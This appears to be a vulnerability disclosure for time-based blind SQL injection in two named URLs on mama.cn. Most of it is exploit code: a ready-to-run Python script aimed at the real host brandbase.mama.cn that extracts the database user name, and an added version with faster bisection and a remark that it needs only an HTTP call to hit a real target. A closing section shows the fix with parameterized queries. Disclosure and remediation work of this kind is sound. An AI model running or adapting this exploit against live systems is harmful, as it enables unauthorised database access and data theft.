MySQL blind injection (with PoC) on a website of alimama (mama.cn)
MySQL blind injection
URL: http://brandbase.mama.cn/yikexin.php?ctype=*&mod=growth&op=detail&pgcount=12&tid=1520677
POST parameter: page=20
Injectable parameter: ctype (marked with * in the URL above)
sqlmap could not exploit this point, so I modified lijiejie's script rather than reinvent the wheel.
There are actually two injection points; the other one is on the main site. Because of my network environment I cannot reach that URL right now, but I remember that
the current user starts with something like hr and is 36 characters long.
URL: http://www.mama.cn:80/photo/index.php?a=Search&d=index&g=Search&gotosearch=yes&keyword=*&num=25&page=1&searchtype=photo
Injectable parameter: keyword (marked with * in the URL above)
PoC:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# mysql_timebased.py
import http.client
import urllib.parse

HOST = 'brandbase.mama.cn'
PATH = '/yikexin.php?ctype=%s&mod=growth&op=detail&pgcount=12&tid=1520677'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0',
    'Content-Type': 'application/x-www-form-urlencoded',
}
body = urllib.parse.urlencode({'page': '20'})
# alphabet the user name is searched over, one character at a time
payloads = 'abcdefghijklmnopqrstuvwxyz1234567890.@_*%'
TIMEOUT = 3   # seconds; sleep(3) in the query pushes a true condition past this


def is_true(cond):
    """Time-based oracle: wrap the condition in if(cond,sleep(3),0) and send it
    three times; it is accepted as true only if all three requests time out.
    The same probe is placed for an unquoted value, a single-quoted string and
    a double-quoted string, with comment markers hiding the rest of the query,
    so the payload works no matter how ctype is embedded in the SQL."""
    probe = 'if(%s,sleep(3),0)' % cond
    s = "%s/*'XOR(%s)OR'%%22XOR(%s)OR%%22*/" % (probe, probe, probe)
    err_count = 0
    for j in range(3):
        try:
            conn = http.client.HTTPConnection(HOST, timeout=TIMEOUT)
            conn.request('POST', PATH % s, body=body, headers=headers)
            conn.getresponse()
            conn.close()
            print('*', end='', flush=True)
        except Exception:
            err_count += 1   # timeout (or connection error) counts as "slept"
    return err_count == 3


def get_user_length(max_len=64):
    """Scan the length of user() one value at a time (64 is an assumed upper bound)."""
    for i in range(1, max_len + 1):
        if is_true('length(user())=%d' % i):
            return i
    return 0


def get_user(length):
    """Recover lower(user()) position by position; mid() positions are 1-based."""
    user = ''
    for i in range(1, length + 1):
        for ch in payloads:
            if is_true('ascii(mid(lower(user()),%d,1))=%d' % (i, ord(ch))):
                user += ch
                print('\n[info]', user)
                break
    return user


def main():
    userlen = get_user_length()
    print('user length:\n', userlen)
    current_user = get_user(userlen)
    print('\nCurrentUser is:', current_user)


if __name__ == '__main__':
    print('mysql-timebased-sqlinjection:\n')
    main()
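To show how the PoC's oracle actually works without touching any server, here is an added example (not part of the original report or lijiejie's script) that builds the same context-agnostic time-based payload, runs the extraction loop against a constructed in-memory stand-in for the injectable page, and improves on the PoC in two places a practitioner would care about: the sleep is kept longer than the client timeout so jitter cannot flip a result, and each character is found by bisection on its ASCII code instead of walking the alphabet. The endpoint class, the user name "hr_example@10.0.0.1" and the 64-character length bound are all assumptions made for the demo.

```python
import re

SLEEP_SECONDS = 5    # delay the injected sleep() adds; kept above the client
HTTP_TIMEOUT = 3     # timeout so network jitter cannot turn a true into a false
CONFIRMATIONS = 3    # consecutive timeouts required, like the PoC's err_count == 3


def build_payload(condition, delay=SLEEP_SECONDS):
    """Context-agnostic time-based probe: the same if(cond,sleep(),0) is emitted
    for an unquoted value, a single-quoted string and a double-quoted string,
    and the comment markers neutralise whatever SQL follows the injection."""
    probe = "if(%s,sleep(%d),0)" % (condition, delay)
    return "%s/*'XOR(%s)OR'\"XOR(%s)OR\"*/" % (probe, probe, probe)


class FakeMySQLEndpoint:
    """Constructed stand-in for the injectable page (no network involved).
    It evaluates only the two condition shapes the extraction loop sends and
    returns the number of seconds the request would have taken."""
    _len_re = re.compile(r"^length\(user\(\)\)=(\d+)$")
    _chr_re = re.compile(r"^ascii\(mid\(lower\(user\(\)\),(\d+),1\)\)([<=>])(\d+)$")

    def __init__(self, current_user):
        self.current_user = current_user   # what user() would return (assumed)
        self.requests = 0

    def _evaluate(self, condition):
        m = self._len_re.match(condition)
        if m:
            return len(self.current_user) == int(m.group(1))
        m = self._chr_re.match(condition)
        if m:
            pos, op, val = int(m.group(1)), m.group(2), int(m.group(3))
            lowered = self.current_user.lower()
            # MySQL: mid() past the end gives '' and ascii('') is 0
            code = ord(lowered[pos - 1]) if pos <= len(lowered) else 0
            return {"<": code < val, "=": code == val, ">": code > val}[op]
        raise ValueError("unsupported condition: " + condition)

    def request(self, payload):
        self.requests += 1
        condition = payload[len("if("):payload.index(",sleep(")]
        return float(SLEEP_SECONDS) if self._evaluate(condition) else 0.0


def condition_holds(endpoint, condition):
    """Accept a 'true' only after CONFIRMATIONS consecutive timeouts: one slow
    response is a network hiccup, three in a row is the sleep()."""
    payload = build_payload(condition)
    for _ in range(CONFIRMATIONS):
        if endpoint.request(payload) < HTTP_TIMEOUT:
            return False
    return True


def user_length(endpoint, max_len=64):
    """Linear scan of the length, as the PoC does (64 is an assumed bound)."""
    for n in range(1, max_len + 1):
        if condition_holds(endpoint, "length(user())=%d" % n):
            return n
    return 0


def user_char(endpoint, pos):
    """Bisection over the character code: at most 7 confirmed conditions per
    character instead of walking the PoC's 41-symbol alphabet."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if condition_holds(endpoint, "ascii(mid(lower(user()),%d,1))>%d" % (pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_user(endpoint):
    """Recover lower(user()) character by character, like the PoC's GetUser()."""
    n = user_length(endpoint)
    return "".join(user_char(endpoint, i) for i in range(1, n + 1))


if __name__ == "__main__":
    target = FakeMySQLEndpoint("hr_example@10.0.0.1")   # made-up user for the demo
    print("recovered:", extract_user(target), "in", target.requests, "requests")
```

Against a real target the only change is replacing FakeMySQLEndpoint.request with an HTTP request whose elapsed time (or timeout) is returned; the confirmation loop and the bisection stay as they are.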
Fix:
Filter the input (check ctype and keyword against the type or set of values the page actually expects) and use parameterized SQL queries instead of concatenating request parameters into the statement.
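The following is an added example (not code from the report or from the affected site) that puts the recommended fix next to the vulnerable pattern. It uses an in-memory SQLite table as a constructed stand-in for the records yikexin.php reads; the table, the allow-list of ctype values and the row contents are assumptions for the demo. SQLite has no if(), sleep() or XOR, so the PoC payload produces a parse error in the concatenated query where MySQL would sleep, which is enough to show that it reached the SQL parser, while the parameterized version treats the same bytes as an ordinary value that matches nothing.

```python
import sqlite3

# The PoC's time-based payload as it arrives in ctype (the %22 the PoC sends
# is a plain double quote once the server URL-decodes it).
PAGE_PAYLOAD = "if(1,sleep(3),0)/*'XOR(if(1,sleep(3),0))OR'\"XOR(if(1,sleep(3),0))OR\"*/"
BOOLEAN_PAYLOAD = "x' OR 1=1 --"

ALLOWED_CTYPES = {"brand", "growth"}   # assumed set of legal ctype values


def make_db():
    """Constructed in-memory table standing in for the data yikexin.php reads."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE growth (tid INTEGER, ctype TEXT, title TEXT)")
    db.executemany("INSERT INTO growth VALUES (?, ?, ?)", [
        (1520677, "brand", "public brand page"),
        (1520678, "internal", "unreleased campaign"),
    ])
    return db


def lookup_vulnerable(db, ctype, tid):
    """The pattern behind the bug: request parameters pasted into the SQL text."""
    sql = "SELECT tid, title FROM growth WHERE ctype = '%s' AND tid = %s" % (ctype, tid)
    return db.execute(sql).fetchall()


def lookup_parameterized(db, ctype, tid):
    """Parameterized statement: the driver passes ctype as data, never as SQL."""
    sql = "SELECT tid, title FROM growth WHERE ctype = ? AND tid = ?"
    return db.execute(sql, (ctype, tid)).fetchall()


def lookup_hardened(db, ctype, tid):
    """Filtering on top of parameterization: ctype must come from the allow-list
    and tid must be an integer, so junk is rejected before it reaches the DB."""
    if ctype not in ALLOWED_CTYPES:
        raise ValueError("unexpected ctype")
    return lookup_parameterized(db, ctype, int(tid))


def payload_reaches_parser(db, ctype):
    """True when the concatenated query fails to parse: on SQLite the PoC payload
    is a syntax error, on MySQL the same position yields the 3-second sleep."""
    try:
        lookup_vulnerable(db, ctype, 1520677)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("concatenated + boolean payload:", lookup_vulnerable(db, BOOLEAN_PAYLOAD, 1520677))
    print("PoC payload parsed as SQL:", payload_reaches_parser(db, PAGE_PAYLOAD))
    print("parameterized + PoC payload:", lookup_parameterized(db, PAGE_PAYLOAD, 1520677))
    print("hardened + valid input:", lookup_hardened(db, "brand", "1520677"))
```

In PHP the equivalent of lookup_parameterized is a PDO or mysqli prepared statement with bound parameters; the allow-list check belongs in front of it, because parameterization stops injection but does not stop a request from asking for a ctype the page was never meant to serve.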